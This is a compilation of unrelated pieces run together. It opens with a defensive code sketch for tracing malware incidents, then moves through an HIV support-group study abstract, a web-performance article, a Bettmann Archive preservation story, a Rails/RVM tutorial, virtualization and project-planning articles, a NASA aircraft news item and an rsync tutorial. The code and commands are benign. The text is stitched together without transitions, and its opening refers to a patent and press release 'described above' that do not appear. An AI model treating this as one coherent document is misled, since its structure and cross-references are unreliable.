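The patented method is only described above at a high level. As a loose illustration of the underlying idea of walking from a detected object back to the source event and then forward to all child events, consider the following sketch; it is a simplified model written for this article, not Kaspersky's implementation, and the file names are invented:

    from collections import defaultdict

    # Each logged event records what acted (parent) and what it produced (child),
    # e.g. a process creating a file or writing a registry entry.
    events = [
        ("browser.exe", "trojan.exe"),
        ("trojan.exe", "dropper2.exe"),
        ("dropper2.exe", "keylogger.dll"),
        ("explorer.exe", "notes.txt"),  # unrelated, benign activity
    ]

    children = defaultdict(list)
    parent_of = {}
    for parent, child in events:
        children[parent].append(child)
        parent_of[child] = parent

    def find_source(detected):
        """Walk back up the event log to the earliest recorded ancestor (the incident source)."""
        node = detected
        while node in parent_of:
            node = parent_of[node]
        return node

    def incident_scope(detected):
        """Collect every object created, directly or indirectly, from the incident source."""
        root = find_source(detected)
        seen, stack = set(), [root]
        while stack:
            node = stack.pop()
            for child in children.get(node, []):
                if child not in seen:
                    seen.add(child)
                    stack.append(child)
        return root, seen

    if __name__ == "__main__":
        source, artifacts = incident_scope("keylogger.dll")
        print("incident source:", source)
        print("objects created during the incident:", sorted(artifacts))

A real implementation would of course also classify which of those objects are malicious and drive the removal, quarantine and rollback actions described in the press release.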
Mavhu W., University of Zimbabwe | Mavhu W., Center for Sexual Health and Research Zimbabwe (CeSHHAR Zimbabwe) | Mavhu W., University College London | Chirawu P., University of Zimbabwe | And 11 more authors.

PLoS ONE | Year: 2013

Background: There is a recognized gap in the evidence base relating to the nature and components of interventions to address the psycho-social needs of HIV positive young people. We used mixed methods research to strengthen a community support group intervention for HIV positive young people based in Harare, Zimbabwe.

Methods: A quantitative questionnaire was administered to HIV positive Africaid support group attendees. Afterwards, qualitative data were collected from young people aged 15-18 through tape-recorded in-depth interviews (n = 10), 3 focus group discussions (FGDs) and 16 life history narratives. Data were also collected from caregivers, health care workers, and community members through FGDs (n = 6 groups) and in-depth interviews (n = 12). Quantitative data were processed and analysed using STATA 10. Qualitative data were analysed using thematic analysis.

Results: 229/310 young people completed the quantitative questionnaire (74% participation). Median age was 14 (range 6-18 years); 59% were female. Self-reported adherence to antiretrovirals was sub-optimal. Psychological well being was poor (median score on Shona Symptom Questionnaire 9/14); 63% were at risk of depression. Qualitative findings suggested that challenges faced by positive children include verbal abuse, stigma, and discrimination. While data showed that support group attendance is helpful, young people stressed that life outside the confines of the group was more challenging. Caregivers felt ill-equipped to support the children in their care. These data, combined with a previously validated conceptual framework for family-centred interventions, were used to guide the development of the existing programme of adolescent support groups into a more comprehensive evidence-based psychosocial support programme encompassing caregiver and household members.

Conclusions: This study allowed us to describe the lived experiences of HIV positive young people and their caregivers in Zimbabwe. The findings contributed to the enhancement of Africaid's existing programme of support to better promote psychological well being and ART adherence. © 2013 Mavhu et al.
A World of Content on Every Web Site

Solving the Performance Challenges for Media and Portal Sites

In April 2009, Google sent a video reporter to Times Square to ask passers-by to answer the simple question, "What is a browser?" (See the video). Fewer than 8 percent of the respondents could answer the question correctly. It would be interesting to follow up this random survey with the similarly disarming question, "What is a Web site?" No doubt the average Internet user would find that question equally, if not more, challenging.

Wikipedia (see accompanying interview) defines a Web site this way:

A website (also spelled Web site or web site) is a collection of related web pages, images, videos or other digital assets that are addressed with a common domain name or IP address in an Internet Protocol-based network. A web site is hosted on at least one web server, accessible via a network such as the Internet or a private local area network. A web page is a document, typically written in plain text interspersed with formatting instructions of Hypertext Markup Language (HTML, XHTML). A web page may incorporate elements from other websites with suitable markup anchors.

That definition encompasses the many elements and permutations that make up a Web page or site. But to the average Internet user, a Web site is a single destination that delivers information or entertainment in various forms — video streams, photos, localized weather, feature stories. What does it matter where the content is coming from? For the average user (emphasis on average), all the content is coming from the one site they're visiting. But as anyone who works in the industry is well aware, the content on any given site can originate from a number of sources.

Media Mash-Ups and Personalized Portals

Perhaps some of the most complicated sites on the Web are media outlets for news, sports, and entertainment, and portal sites like AOL, Yahoo!, iGoogle and the like. These destinations define "rich" content, loaded as they are with video streams, Flash movies, news feeds, tweets and, of course, advertising. Some of the mash-ups are completely transparent. Google News, for example, gives clear attribution to the sources of its stories; none of its content is original. On other sites, pulled-in content is not so obvious. And in most cases, content is being pulled in from multiple sources completely invisibly to the viewer.

While it's not yet the "semantic Web" envisioned a decade ago by Sir Tim Berners-Lee, the man credited with inventing the World Wide Web — a Web where machines can understand, analyze, and combine information in usable ways without human intervention — the fact is that today's Web relies very much on the free and automatic exchange of content among unrelated sites. Whether it's external news feeds, product information from a manufacturer, live updates from Twitter, or the ubiquitous ad banners and boxes, more and more Web sites are populating their pages with content that comes from somewhere else on the Web — including owned or outsourced content delivery networks and the site owner's own affiliated domains. For webmasters, this makes for complicated site performance and user experience challenges.

The Complexities of Content

"Gone are the days of a simple Web page with one or two people updating it," says Shawn White, director of external operations for Keynote.
"Nowadays, you have dozens, if not hundreds of servers and computers that are all over the world trying to serve up this content as fast as possible, and being updated by any number of people, including the public. For Web operations and IT managers who are responsible for uptimes and availability, it just makes things a whole lot more complex."

In those days, back near the turn of the century, when sites created and pushed content out more or less from a single source, performance was in the hands of the site owners. They were responsible for implementing and configuring the capacity they needed to handle their expected traffic — and when there were performance lapses, they looked in the mirror to find the sources and solutions. After 9/11, for example, many of the major news sites went down for hours or days. They simply weren't designed to handle the tremendous surge in visitors as Americans flocked to the Internet for news and updates. These were perhaps the most significant, spontaneous flash crowds that the adolescent Internet saw, and many sites' inability to handle them was painfully obvious. But the problems were mainly internal capacity and external bandwidth.

Fast forward to today. In less than a decade since 9/11, the capacity of the Internet overall and of individual Web sites to handle traffic has increased exponentially — as have user expectations that sites will be available and fast 24/7/365. Today, Web sites are no longer single-source, singly hosted affairs; content is often fed from multiple external sources to populate a page. Bandwidth-intensive, processor-hungry video is everywhere, and is the life blood of many media sites. Flash-crowd events large and small are not uncommon, and by and large, most sites take them reasonably in stride. Site crashing is a much rarer phenomenon, even in the crush of traffic after a tsunami, an historic election, or a plane landing in the Hudson. Site performance, however, can still be significantly degraded by a major surge in traffic.

Rooting Out Page-Load Problems

One recent event brought many sites to their knees: the death of pop icon Michael Jackson. Akamai reported an 11 percent spike in Internet traffic worldwide in the hour the news was breaking. (Source: Adotas.com, "Ad Networks, Not Websites, Choked on Michael Jackson News," by Edward Barrera, July 1, 2009.) Major news outlets that are followed in the Keynote Performance Index saw their availability plummet as low as 10 percent. The Los Angeles Times, Jackson's hometown news site, had significant problems. Analysis revealed, however, that in a number of cases, it was not the site's inability to handle the surge of traffic, but rather the inability of the third-party servers delivering ads to the sites to keep up with the demand. Pages froze as they waited for the ads to load. And users had to wait for their news, if they got it at all.

The Michael Jackson story is a dramatic example, but third-party content can eat away at site performance every day. Ads can be notoriously slow to load, but ads are not the only culprit. Twitter feeds, linked content from other sites, page assets delivered by content delivery networks, even Google analytics embedded in pages — all can slow a site down to uncompetitive, if not unacceptable levels.

You can't have a media site without video, and apparently, if a little video is good, a lot of video is better. It's the heart and soul of entertainment sites. It's de rigueur for the broadcast news networks.
And the Web has given traditional print journalism brands the opportunity to compete on broadcast journalism's video turf. New technology has made it almost as easy to shoot, edit and post a video online as to prepare a written story with accompanying photos. Online media sites, with help from YouTube, have enabled a mass Web audience that prefers to watch rather than read. There's also no faster way to lose an audience than with a video stream that stutters and constantly stops to rebuffer. But again, monitoring streams from multiple servers or domains, and understanding actual end-user performance, is a significant test and measurement challenge.

Who's on First? What's on Second?

Site owners are more pressured than ever to deliver the fast, flawless experiences users now demand, and can often find at a competitor's site. Monitoring and measuring their performance is no longer the simple task of measuring overall page load time. There's really nothing a webmaster can do with the information that the site is running slow. Is it their own content? The CDN that's pushing out their videos? The sister site that's hosting their image library? The Flash banner promoting upcoming programming on their TV network? Or the ad network servers that supply the bulk of the site's revenue? How does the site owner identify the bottlenecks, and gain actionable data to demand better performance from weak providers in the content chain?

Measuring for Management

"When a site is being updated from different sources, you have to be able to figure out where your slowdowns are happening," White explains. "Is it happening with a third-party ad? Is it with a Twitter or RSS feed? Is it with Flash or some other content that's being uploaded?

"The bottom line is, you can't manage what you don't measure. First you have to determine what's normal for your site. You need a benchmark for what's normal for you — and that can vary by the hour or day of the week depending on your traffic patterns — and it's also helpful to benchmark against your competition."

Keynote offers services that drill down into overall page performance to provide sub-data that reflects the mosaic of content types and sources that typify complex media and portal Web pages. Using a suite of fast, simple-to-use tools, individual page components can be isolated or grouped into measurable "virtual pages," so that the performance impact of each can be specifically characterized. Page components can be filtered by any variety of criteria, including domain, page element, size, and more. Third-party content providers — and internal resource managers — can then be held accountable for any performance shortcomings. Or the construction of the page itself can be tweaked for greater responsiveness.

"There are a number of ways that IT managers, webmasters and Web developers can implement improvements," White says. "It's surprising that there's still a lot of people who don't use these fundamental tricks of the trade; they either just don't know about them or it hasn't been as big of an issue.

"So they're preloading advertisements or putting ads first in the code; one fix could be as simple as making the ads last to load on the page. Using Keynote tools, you can make adjustments and measure to see if it has any effect, and repeat that process on various components until the page actually meets your requirements for responsiveness."

Mobile Web the New Mainstream?

Love it or hate it, the iPhone has dramatically changed the way masses of consumers use the Web.
For media companies and online portals like AOL and Google, an online presence is not complete without a robust mobile site and/or application. Delivering an exceptional user experience on a mobile device is fraught with the same challenges as computer-delivered content, with the added complexity of hundreds and hundreds of device profiles, and the bandwidth challenges of cellular signals. And again, the challenge is not only with the site owner's hosted content, but with third-party feeds including ads and videos. How do you measure what the end-user is actually experiencing?

"Can you emulate that experience or do you need to do it from a real iPhone?" White asks. "With Keynote's Mobile Device Perspective, we have a network of real, actual iPhones around the world. We have real iPhones, connected to computers so we can take a recorded transaction or scenario. We can set up a script that says load the CNN app and click on the first headline, and how long does that take?

"We also have a service where we can emulate a phone — or 1,600 different phones — and do similar types of things. The advantage of our emulated service is that we get more details about the network — signal strength, what cell tower is the signal coming through."

Performance Pays — Or Not

Slow page loads make for a bad user experience that can cause visitors to abandon sites. Recent studies suggest that visitors expect a page to load in just two seconds. So ad delivery that slows page performance down, or videos that take forever to stream, have a real financial impact. The site owner potentially loses revenue because they are delivering less traffic to the advertiser. The ad networks take a hit because it lowers the number of eyeballs they are delivering as well. And the advertisers themselves are not getting the exposure they are counting on to market their products or services.

All three parties then — site owner, ad network and advertiser — have a stake in understanding where the performance issues lie. With accurate performance data in hand, site owners can demand that ad networks perform to their minimum standards, or they can switch their sites to competitive networks (after making sure, that is, that their own page construction is optimized for best performance). Ad networks, in turn, can use the data to improve their delivery or to demonstrate to clients that they are delivering as promised. And advertisers can know if their message is getting out, and if it isn't, they can explore alternate channels for their advertising.

Best Practices for Page Component Testing

The only accurate way to gauge page performance for end users is with live testing, in the field, using real browsers located across all the geography being served. Keynote's testing network includes some 3,000 "typical" computers running Internet Explorer in 80 countries around the world. Tests can be constructed to simply measure home page load times, or to measure a specified task sequence. And with "virtual page" testing, individual page components — ad feeds or Flash movies, for example — can be individually benchmarked.

"With the data from this kind of testing," White says, "IT and site managers can find out, where are my slowdowns? Are my slowdowns regional? Is it East Coast versus West Coast? Is it third-party feeds that are hanging my pages up? Or is it the ISP in a particular region?

"At the end of the day, you have to test in Johannesburg to know how your site is performing in Johannesburg. There's nothing that beats the real thing.
And that's what our testing products do. We go to great lengths to make it as real-life as possible."
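To illustrate the kind of per-provider breakdown that "virtual page" measurements enable, here is a rough sketch that groups resource timings by serving domain; the URLs and timings are invented, and this is an illustration of the general idea rather than Keynote's tooling:

    from collections import defaultdict
    from urllib.parse import urlparse

    # Hypothetical per-resource timings for one page view (URL, milliseconds spent loading).
    resources = [
        ("http://www.example-news.com/index.html",       310),
        ("http://cdn.example-news.com/player.swf",       780),
        ("http://cdn.example-news.com/headline.jpg",     150),
        ("http://ads.example-adnetwork.com/banner.js",  1240),
        ("http://feeds.example-partner.com/latest.xml",  420),
    ]

    def virtual_pages(resources):
        """Group resource timings by serving domain -- a crude 'virtual page' per provider."""
        groups = defaultdict(lambda: {"count": 0, "ms": 0})
        for url, ms in resources:
            domain = urlparse(url).netloc
            groups[domain]["count"] += 1
            groups[domain]["ms"] += ms
        return groups

    if __name__ == "__main__":
        total = sum(ms for _, ms in resources)
        ranked = sorted(virtual_pages(resources).items(), key=lambda kv: -kv[1]["ms"])
        for domain, g in ranked:
            share = 100.0 * g["ms"] / total
            print(f"{domain:35s} {g['count']} requests  {g['ms']:5d} ms  ({share:.0f}% of load time)")

Sorting providers by their share of total load time makes it obvious whether the bottleneck is the site's own content, a CDN, or a third-party ad or feed server.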
The Bettmann Archive contains some of the world's most recognizable photographic images – from Marilyn Monroe to Rosa Parks to a work crew perched on a girder above New York City. When Corbis Images acquired the Bettmann Archive in 1995, the challenge was to provide access for Corbis' client base to this historic trove of images. Working with Iron Mountain, Corbis was able to manage the digitizing and archiving efforts for this massive collection and provide worldwide access to this rich legacy of historically significant visual images.

In 1933, Otto Bettmann, an independent art curator, fled Nazi Germany with two trunks of original photographs. Over the ensuing decades, this collection, known as the Bettmann Archive, expanded to include over 11 million images, including iconic photos of the Beatles, Ernest Hemingway, Franklin Roosevelt, and The Kennedys. It is widely considered the most comprehensive collection of historically and culturally important photography in the world. Acquired in 1995 by Corbis Corporation, it is now the crown jewel of Corbis' collection of over 100 million images. Corbis is a creative resource for advertising, marketing, and media professionals around the world. Corbis provides photographic images, illustrations, and film footage. It also provides rights and clearance services.

The Bettmann Archive contains 11 million images: prints, negatives, and various formats of photography. The overall storage in this vault is 20 million images. Corbis had a responsibility to protect this collection: images that the world knows. Images such as Rosa Parks seated in the front of the bus, Marilyn Monroe with her skirt blowing up, Einstein sticking out his tongue. Corbis acquired that collection in 1995 and we were challenged with preserving the collection and providing access to it.

Corbis realized that the Bettmann Archive was already deteriorating and quickly consulted with Wilhelm Imaging Research, an expert on film preservation. After scouring the globe for a secure location that could offer the geological and temperature stability required to protect the original images, Iron Mountain was selected to create a 20,000 sq. ft. temperature-controlled archive in its high-security, underground facility to arrest the aging of the original film. In Iron Mountain's secure, underground environment, where temperatures are stabilized at -20 degrees Celsius, Corbis expects the Bettmann collection to remain preserved nearly unchanged for thousands of years. The partnership that was created with Iron Mountain enables us to achieve that.

Many of the images in this vault are not scanned, so Corbis staff locates the images and Iron Mountain provides imaging services and scans them. Iron Mountain has built digital studios within its facilities to provide image, audio, and film restoration services to clients in the entertainment industry as well as to music labels, museums, and academic institutions. With state-of-the-art mastering suites, digital imaging specialists, film preservationists, and one of the largest collections of vintage media players in the world, Iron Mountain helps to digitize and restore content.
In this series, I would like to demonstrate some of the basics of building a Ruby on Rails application and how MVC (Model-View-Controller) works. We will discuss some of the security pitfalls as well. Firstly, we need to make sure the tech is understood. That being said, in this first part of the series, let's discuss some general Ruby "stuff" that makes life a little bit easier when dealing with day to day Ruby tasks: RVM, RVM Gemsets, and an RVM resource file.

On the surface, Ruby Version Manager (RVM) allows you to host multiple versions of Ruby on your system and easily switch between them. If you go a little deeper, you'll see that RVM also provides the ability to host multiple "Gemsets" within each version of Ruby. This means you can create a Gemset per application and never worry about conflicting dependency versions. One last thing to mention: you can do all of this seamlessly leveraging an .rvmrc file. When you change into the application's folder that holds an .rvmrc file, you will automatically switch Ruby versions and gemset based on the values specified in the rvm resource file (.rvmrc).

Firstly, let's choose our Ruby version as well as the name of our Gemset. I'm going to choose Ruby Enterprise Edition (already installed via $ rvm install ree) and name my Gemset after the application, "attackresearch". Shown later.

Now let's install Rails and its required gems. Let's create the Rails application!

Now let's get the Gemfile and .rvmrc in order. I'm going to add the 'twitter-bootstrap-rails' gem and then perform a "bundle install". Whenever a change is made to your Gems, run 'bundle install' again to update the Gemfile.lock file. The reason for twitter bootstrap will become clear later in these tutorials. Essentially, it allows us to easily create the visual aspects of the application.

Now for the .rvmrc file. Just to test that the .rvmrc file works, let's leave the directory then navigate back into it. Lastly, perform a 'gem list' to ensure our gems are available.

Now let's start it up!

Okay, that's enough for now. More to come in the next post :-)
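The original post showed the actual commands and their output as screenshots, which are not reproduced here. Under the assumptions stated in the text (Ruby Enterprise Edition, a gemset named "attackresearch", and the twitter-bootstrap-rails gem), the steps would look roughly like the following; this is a reconstruction, not the author's exact commands or output:

    # Create and switch to a gemset named after the application (assumes REE is installed).
    $ rvm use ree@attackresearch --create

    # Install Rails into that gemset and generate the application.
    $ gem install rails
    $ rails new attackresearch
    $ cd attackresearch

    # .rvmrc in the application root, so the ruby/gemset switch happens automatically on cd:
    rvm use ree@attackresearch

    # Gemfile: add the bootstrap gem, then resolve dependencies.
    gem 'twitter-bootstrap-rails'
    $ bundle install

    # Sanity check the gemset, then start the server.
    $ gem list
    $ rails server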
Modern technology makes it easier for owners to operate their business. Knowing which technology to use and the right time to implement it is essential if you want to boost productivity as well as reduce operating costs. One of the best ways to do this is to virtualize. While virtualization is being adopted more widely by business owners, many are still questioning what it actually is and whether or not to implement it.

Virtualization is the act of migrating physical systems into a virtual environment. In other words, it is the creation of a virtual version of a device or resource: anything from a server to an operating system. By providing a virtual view of computing resources, virtualization allows you to turn one server into a host for a group of servers that all share the same resources. With virtualization, you can instantly access nearly limitless computing resources, which allows for faster and broader business capabilities. It also gets rid of haphazard IT rooms, cables, and bulky hardware, reducing your overall IT overhead as well as management costs. While many equate virtualization with the cloud, in reality the cloud is just one part of virtualization.

The most important function of virtualization is the capability of running multiple operating systems and applications on a single computer or server. This means increased productivity achieved with fewer servers. Virtualization can usually improve overall application performance thanks to technology that can balance resources and provide only what the user needs.

Virtualization can be a solution for many businesses, but not for all. The key is to know exactly when to virtualize. Here are four situations where a business could virtualize systems:

There are several reasons as to why many businesses look into virtualization. Like any type of technology, it's a tradeoff between practicality and money. If you think you're ready to move your systems to a virtual world or are looking to learn more about virtualization solutions, contact us today.
Project Management Success Factors Part 4

The fourth critical factor for project success is having a well-developed project plan. Here is a six-step approach to creating a project plan, not only showing how it provides a road map for project managers to follow, but also why it is the project manager's premier communications and control tool throughout the project.

Step 1: Explain the Project Plan to Key Stakeholders and Discuss Its Key Components

The project plan, one of the most misunderstood terms in project management, is a set of living documents that can be expected to change over the life of the project. Like a road map, it provides the direction for the project. And like the traveler, the project manager needs to set the course for the project, which, in project management terms, means creating the project plan. Just as a driver may encounter road construction or new routes to the final destination, the project manager may need to correct the project course as well.

A common misconception is that the plan equates to the project timeline, which is only one of the many components of the plan. The project plan is the major work product from the entire planning process, so it contains all of the planning documents for the project. For example, a project plan for constructing a new office building needs to include not only the specifications for the building, the budget and the schedule, but also the risks, quality metrics, environmental impact, etc.

Step 2: Define Roles and Responsibilities

Identifying stakeholders, those who have a vested interest in either the project or the project outcome, is challenging and especially difficult on large, risky, high-impact projects. In addition, there are likely to be conflicting agendas and requirements among stakeholders, as well as different slants on who needs to be included. It is important for the project manager to get clarity and agreement on what work needs to be done by whom, as well as which decisions each stakeholder will make.

Step 3: Develop a Scope Statement

The scope statement is arguably the most important document in the project plan. It is used to gain common agreement among the stakeholders about the project definition. It is the basis for securing the buy-in and agreement from the sponsor and other stakeholders, and decreases the chances of miscommunication. This document will most likely grow and change with the life of the project and should include:

- Business need and business problem.
- Project objectives, stating what will occur within the project to solve the business problem.
- Benefits of completing the project and justification for the project.
- Project scope (which deliverables will be included and excluded from the project).
- Key milestones, the approach and other components as dictated by the size and nature of the project.

The scope statement can be treated as a contract between the project manager and sponsor, one that can only be changed with sponsor approval.

Step 4: Develop the Project Baselines

The first project baseline you must develop is the scope baseline. Once the deliverables are confirmed in the scope statement, they need to be developed into a work breakdown structure (WBS), which is a decomposition of all the deliverables in the project. The scope baseline includes all the deliverables produced on the project, and therefore identifies all the work to be done.
Building an office building, for example, would include a variety of deliverables related to the building itself, as well as such things as impact studies, recommendations, landscaping plans, etc. Schedule and cost baselines must then be developed: - Identify activities and tasks needed to produce each of the deliverables identified in the scope baseline. The level of detail in the task list depends on many factors, including the experience of the project manager and team, project risk and uncertainties, ambiguity of specifications, amount of buy-in expected, etc. - Identify resources for each task, if known. - Estimate how many hours it will take to complete each task. - Estimate cost of each task, using an average hourly rate for each resource. - Consider resource constraints, or how much time each resource can realistically devote to this one project. - Determine which tasks are dependent on other tasks, and develop critical path. - Develop schedule, which is a calendarization of all the tasks and estimates. It shows by chosen time period (week, month, quarter or year) which resource is doing which tasks, how much time they are expected to spend on each task, and when each task is scheduled to begin and end. - Develop the cost baseline, which is a time-phased budget, or cost by time period. This process is not a one-time effort. Throughout the project you will most likely be adding to or repeating some or all of these steps. Step 5: Create Baseline Management Plans Once the scope, schedule and cost baselines have been established, create the steps the team will take to manage variances to these plans. All of these management plans usually include a review and approval process for modifying the baselines. Different approval levels are usually needed for different types of changes. In addition, not all new requests will result in changes to the scope, schedule or budget, but a process is needed to study all new requests to determine their impact to the project. Step 6: Communicate! One important aspect of the project plan is the communications plan. This document states such things as: - Who on the project wants which reports, how often, in what format and using what media. - How issues will be escalated and when. - Where project information will be stored and who can access it. - What new risks have surfaced and what the risk response will include. - What metrics will be used to ensure a quality product is built. - What reserves have been used for which uncertainties. Once the project plan is complete, it is important to communicate its contents to key stakeholders. This communication should include such things as: - Review and approval of the project plan. - Process for changing the contents of the plan. - Next steps—executing and controlling the project plan and key stakeholder roles/responsibilities in the upcoming phases. Developing a clear project plan certainly takes time, and the project manager will probably be tempted to skip the planning and jump straight into execution. However, remember this: The traveler who plans the route before beginning a journey ultimately reaches the intended destination more quickly and more easily than the disorganized traveler, who gets lost along the way. Similarly, the project manager who takes time to create a clear project plan will follow a more direct route toward destination project success. 
Elizabeth Larson and Richard Larson, co-principals of Edina-based Watermark Learning, have more than 25 years each of experience in business, project management, business analysis and training/consulting. They have presented numerous workshops, seminars and presentations to more than 10,000 participants on project management, requirements analysis and related subjects. E-mail Elizabeth and Richard at email@example.com or firstname.lastname@example.org.
NASA said this week four research teams would split $16.5 million to continue developing quieter, cleaner, and more fuel-efficient jets that the agency says will be three generations ahead of airliners in use today. NASA said the money was awarded after an 18-month study of all manner of advanced technologies from alloys, ceramic or fiber composites, carbon nanotube and fiber optic cabling to self-healing skin, hybrid electric engines, folding wings, double fuselages and virtual reality windows to come up with a series of aircraft designs that could end up taking you on a business trip by about 2030. More on advanced tech: Gigantic changes keep space technology hot Under the contracts, teams from Boeing, Northrop Grumman, MIT, Cessna will develop models that can be tested in computer simulations, laboratories and wind tunnels. The projects look like this: The Boeing Company's Subsonic Ultra Green Aircraft Research, or SUGAR is a twin-engine aircraft with hybrid propulsion technology, a tube-shaped body and a truss-braced wing mounted to the top. Compared to the typical wing used today, the SUGAR Volt wing is longer from tip to tip, shorter from leading edge to trailing edge, and has less sweep. It also may include hinges to fold the wings while parked close together at airport gates. Projected advances in battery technology enable a unique, hybrid turbo-electric propulsion system. The aircraft's engines could use both fuel to burn in the engine's core, and electricity to turn the turbofan when the core is powered down ($8.8 million) MIT's 180-passenger D8 "double bubble" fuses two aircraft bodies together lengthwise and mounts three turbofan jet engines on the tail. Important components of the MIT concept are the use of composite materials for lower weight and turbofan engines with an ultra high bypass ratio (meaning air flow through the core of the engine is even smaller, while air flow through the duct surrounding the core is substantially larger, than in a conventional engine) for more efficient thrust. In a reversal of current design trends the MIT concept increases the bypass ratio by minimizing expansion of the overall diameter of the engine and shrinking the diameter of the jet exhaust instead ($4.6 million). Northrop Grumman will test models of the leading edge of a jet's wing. If engineers can design a smooth edge without the current standard slats, airplanes would be quieter and consume less fuel at cruise altitudes because of the smoother flow of air over the wings ($1.2 million). Cessna will focus on airplane structure, particularly the aircraft outer covering. Engineers are trying to develop what some call a "magic skin" that can protect planes against lightning, electromagnetic interference, extreme temperatures and object impacts. The skin would heal itself if punctured or torn and help insulate the cabin from noise, NASA says ($1.9 million). Follow Michael Cooney on Twitter: nwwlayer8 Layer 8 Extra Check out these other hot stories:
Let's face it. Backups are great, but backup systems are even better. And one great tool for cloning your critical servers is rsync. Whether you clone your file systems to second disks or to entirely different servers, rsync can help get the synchronization done cleanly and efficiently. In fact, rsync is one of the best tools for replicating files, directories full of files, and entire file systems -- and for keeping collections of files on multiple systems in sync. It's both wonderfully efficient and extremely versatile. So let's take a look at how this tool works and see just how easily you can achieve workable redundancy with this very clever tool.

From single files to file systems

While the rsync command might not come to mind as a tool for moving a single file from one place to another, it definitely will do this for you. And, if the file that you're moving is large and you just happen to have an older copy of it sitting on the remote system, you might gain some advantage from rsync's ability to update files by transmitting only the differences between the source and destination files. This feature is rsync's primary claim to fame, and it makes the tool very efficient, especially with respect to the network traffic that it generates. It does, however, mean that you must have rsync installed on both of the systems involved.

The primary advantage of rsync is that, under most conditions, it copies only what it needs to copy. Have a large file that you need to synchronize on a remote server and in which only a single byte is different? No problem: rsync will transmit that single byte after coordinating with rsync on the remote system to determine what it needs to send. Depending on the file you're copying, this behavior can save you a lot of time and network bandwidth.

Copying single files

The simplest form of the rsync command looks like this:

$ rsync helloworld.py /tmp

That's basically just a copy from-here to-there command, though in such a simple example rsync isn't likely to exactly shine. And, like scp, rsync can push files to a remote system or pull files from a remote system if you just reverse the order of the systems.

$ rsync localfile remote-server:/tmp
$ rsync remote-server:/tmp/remotefile /tmp

Rsync also offers the generally useful advantage of creating a missing destination directory if you just end your destination argument with a / as shown in the example below (3rd line). You can, however, only go one level deep with this. If you need your copied file to be deeply nested in a new directory structure, try using mkdir -p with the full directory path first.

$ ls -l /tmp/uploads
ls: /tmp/uploads: No such file or directory
$ rsync helloworld.py /tmp/uploads/
$ ls -l /tmp/uploads
total 4
-rw-r--r-- 1 sbob staff 1237 Feb 29 16:54 helloworld.py

Here, we're copying to a local directory and providing a subdirectory that we want to create. The first command was run just to show that the directory didn't already exist. And, yes, this technique works whether you're copying files to a local or to a remote location.

$ rsync helloworld.py remote-server:/tmp/uploads/

Copying entire directories

Copying an entire directory takes almost no additional effort. In the example below, we're copying a directory, rather than a single file.

$ rsync -av localdir remote-server:/home/sbob
building file list ... done
localdir/
localdir/phase1
localdir/phase2
localdir/phase3
localdir/completion/
localdir/completion/phase4
sent 32535 bytes  received 120 bytes  178.00 bytes/sec
total size is 0  speedup is 0.00

Notice that I tossed in a couple of options with this command -- the -a and -v options. The -a option is a little deceptive. It means "archive mode". This is something of a shortcut, as it takes the place of a string of options that you invoke with just this one letter -- namely -r, -l, -p, -t, -g, -o, and -D. So, with this single option, you get the command to run recursively; copy symbolic links as symbolic links (i.e., rather than creating regular files); and preserve permissions, time stamps, group and owner settings, devices, and special files. In short, with this one option you get the behavior that you're likely to want when replicating a group of files -- namely, they'll be the same both in content and metadata as the original files.

In the example below, we copy a single fairly large file. From the numbers shown, you can see that the file was compressed (see the "sent" bytes figure) and that a significant speedup in the transfer was achieved.

$ ls -l bigfile
-rwxr--r-- 1 sbob staff 7350358 Aug 3 2015 bigfile
$ rsync -avzh bigfile remote-server:/tmp
building file list ... done
bigfile
sent 1.21M bytes  received 42 bytes  268.23K bytes/sec
total size is 7.35M  speedup is 6.09

The -h and -z arguments that we've added above give us more human-readable output during the copying process and ensure that files are compressed during transmission. Some file types -- such as files that are already compressed, like mp3, mp4, and jpg files -- will not be compressed even with this option, presumably because little would be gained in the overall file size. Keep in mind, however, that when you elect to compress your files during transmission, you're trading CPU time (on both ends of the transfer) for network bandwidth. Unless your network is slow or very busy, you might not want to bother.

So far, we've used the arguments shown below, but type rsync --help and rsync will gladly provide you with a list of its several pages' worth of options and short descriptions of what they all mean.

- -a = archive mode (a combination of arguments that works for replication)
- -v = verbose
- -z = compress the file during the transfer
- -h = show numbers in human-readable format

Another nice option that rsync offers is a feature called "dry run". Using the -n option or --dry-run, rsync will show you what it will do when you run the command for real. Just don't get too excited about the speedup figure, as it will be grossly inflated since you're not actually moving files.

$ rsync -av --dry-run bin remote-server:~sbob
building file list ... done
bin/
bin/checkStuff
bin/checkm
bin/chkBackups
...
bin/vpn-users
bin/warnings
sent 3450 bytes  received 704 bytes  1661.60 bytes/sec
total size is 2243025  speedup is 539.97

With and without passwords

Rsync will typically require passwords but, like ssh, allows you to run without being prompted if you're set up to run ssh commands in password-free fashion like I am (i.e., if you've set up your ssh keys and authorized_keys files). This allows you to run rsync commands in hands-off fashion. For example, you can set up cron jobs that can greatly simplify the job of keeping important file collections synchronized.

Closing thoughts on rsync ...

First, synchronization is definitely the best feature of this tool -- ensuring that both copies of a file or groups of files remain the same.
There are numerous options that add to its flexibility. For example, if you remove a file from one system, you might or might not want rsync to remove the file from the remote system. You get to choose. In general, rsync is faster when the files already exist on the receiving side because it can transfer just the file differences. But, again, rsync has to exist on both of the systems involved in the synchronization. By default, rsync uses ssh. This means that you can trust it not to send your data over the wire insecurely. It also means that you can set it up to run unattended (e.g., using cron). While the copy-as-little-as-possible behavior of rsync is one of its more appealing characteristics, it's really only one of many things rsync can do for you. In my next post, I'll provide some more complex rsync commands to demonstrate the many ways the command can be made to do just what you want.
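To make the unattended, cron-driven use mentioned above concrete, here is a minimal sketch of a nightly mirror job. The host name, paths, and log file are hypothetical, and the job assumes the password-free ssh key setup described earlier. Note that --delete removes files from the destination that no longer exist on the source, which may or may not be what you want, so test with --dry-run first.

# hypothetical crontab entry: mirror /home/sbob/bin to a backup server at 2:15 a.m. every night
15 2 * * * rsync -az --delete /home/sbob/bin remote-server:/backups/sbob/ >> /var/log/rsync-backup.log 2>&1

Placed in the crontab of a user whose ssh key is authorized on remote-server, this runs nightly and appends a summary of each transfer to the log so you can confirm the sync is actually happening.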
